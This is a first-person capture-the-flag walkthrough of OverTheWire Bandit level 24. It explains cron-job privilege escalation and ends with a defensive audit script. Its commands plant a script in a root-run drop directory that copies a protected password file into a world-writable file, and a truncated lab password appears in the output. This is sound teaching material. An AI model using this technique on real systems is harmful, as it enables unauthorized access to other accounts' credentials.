Bandit Level 24 Walkthrough

Level 23 ➔ Level 24: Writing My First Exploit Script

1. My Objective

I am currently logged in as bandit23. My mission is to retrieve the password for bandit24. The system has a Cron job that runs a script every minute as the user bandit24. This script looks into a specific "Drop Box" directory (/var/spool/bandit24/foo/), executes every file it finds inside, and then deletes it. My goal is to write a shell script that tells the system to give me the password, and to place that script in the Drop Box folder.

The Mission Clue: I am a low-privilege user, but I can write a set of instructions for a high-privilege user to carry out. Since the Cron job runs as bandit24, my script will have bandit24's permissions when it runs!

2. The Feynman Explanation: The Automated Janitor

How do I get into a locked vault if I don't have the key? I give a list of instructions to someone who does have the key.

The Work Order Analogy:

Imagine there is an Automated Janitor (the Cron Job) who walks through the building every hour. He has a Master Key (permissions) that opens every office. He is programmed to go to a specific basket in the hallway, pick up any Work Orders (scripts) he finds, do exactly what they say, and then shred the order.

I can't go into the Manager's office to read his secret files. But I can put a work order in the basket.

My work order says: "Go into the Manager's office, copy the secret password onto a piece of paper, and leave that paper on my desk in the hallway." Since the Janitor is the one doing the work, the door is unlocked for him. I just have to wait for him to finish and check my desk. This is the essence of privilege escalation via automation.

3. Practical Solution

I start by investigating the Cron script to see exactly how it handles my files.

# Step 1: Read the Janitor's instructions
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
# The script loops through files in /var/spool/bandit24/foo/ and executes them.

# Step 2: Create a temporary workspace and my exploit script
bandit23@bandit:~$ mkdir /tmp/pritom_exploit
bandit23@bandit:~$ cd /tmp/pritom_exploit
bandit23@bandit:~$ echo 'cat /etc/bandit_pass/bandit24 > /tmp/pritom_exploit/pass.txt' > script.sh

# Step 3: Crucial - Set permissions so EVERYONE can read/write/execute
bandit23@bandit:~$ chmod 777 script.sh
bandit23@bandit:~$ touch pass.txt
bandit23@bandit:~$ chmod 777 pass.txt

# Step 4: Drop the script into the Janitor's basket
bandit23@bandit:~$ cp script.sh /var/spool/bandit24/foo/script.sh

# Step 5: Wait 1 minute, then check my "desk" for the password
bandit23@bandit:~$ cat pass.txt
VAfSAn929SAb36906sV... (Password Revealed!)

Why did I use chmod 777?

Permissions are the most common reason scripts fail in this level. When the Cron job runs, it is bandit24 trying to read and execute my file. If I don't give "Others" (the world) permission to read and execute the script, the Janitor will just ignore it. I also made pass.txt world-writable so the Janitor could actually write the password into it.

🚀 My Pro Tips: Debugging My First Script

✨ Use Absolute Paths

In a script run by a Cron job, I never use relative paths (like ./file). The Cron job might be running from a different directory than I expect. I always use full paths like /tmp/work/pass.txt to ensure the script finds its targets.

⭐ The Shebang Line

Professionally, I should start every script with #!/bin/bash. This tells the system exactly which interpreter to use to run the commands. While cat might work without it in this game, it is a vital habit for real-world scripting.

🔍 The Vanishing Act

The image note says "your shell script is removed once executed." This is a common security practice—deleting evidence of a task. I always keep a backup copy of my script in /tmp in case I made a typo and need to try again.

4. Why this matters

This is my first taste of a real "exploit." In the professional world, this is how attackers take over systems. They look for processes running as root or admin that automatically handle user files. If a developer isn't careful, an attacker can "inject" a script just like I did, gaining full control of the server. Understanding this makes me a better defender.
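From the defender's side, the weakness is a directory that other accounts can write to and that a scheduled job executes from. The following audit is an added example, not part of the original walkthrough; audit_dropdir and count_findings are hypothetical names, and the directory to check is whatever path your own scheduled job reads.

```shell
#!/bin/sh
# Added example: audit a directory that a scheduled job executes files from.
# Prints one finding per line and nothing when the directory looks sane.
# audit_dropdir and count_findings are hypothetical names, not system tools.

audit_dropdir() {
    dir=$1
    [ -d "$dir" ] || { echo "missing: $dir is not a directory"; return 0; }

    # World-writable directory: any local user can queue a file for the job.
    if [ -n "$(find "$dir" -prune -perm -0002)" ]; then
        echo "world-writable directory: $dir"
    fi

    # Group-writable directory: every member of the group can do the same.
    if [ -n "$(find "$dir" -prune -perm -0020)" ]; then
        echo "group-writable directory: $dir"
    fi

    # Files owned by someone other than the directory owner (numeric uid),
    # e.g. a script copied in by another account, as on this level.
    owner=$(ls -ldn "$dir" | awk '{print $3}')
    find "$dir" -type f ! -user "$owner" | while IFS= read -r f; do
        echo "foreign-owned file: $f"
    done

    # Files anyone could rewrite between being queued and being executed.
    find "$dir" -type f -perm -0002 | while IFS= read -r f; do
        echo "world-writable file: $f"
    done
}

# Number of findings, so a monitoring check can alert on anything above 0.
count_findings() {
    audit_dropdir "$1" | wc -l | tr -d ' '
}
```

A job that must accept files from other users should at least run them as the submitting user rather than as its own account.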

Scripting Milestone Reached!

I've successfully used a custom script to manipulate system behavior. I'll save this password and move on to Level 24 ➔ Level 25, where I will face a brute-force challenge!

Tags: #Linux #Bandit #OverTheWire #ShellScripting #CronJob #PrivilegeEscalation #Chmod #Exploit #CyberSecurity #FeynmanTechnique #CodeWithPritom #ProTips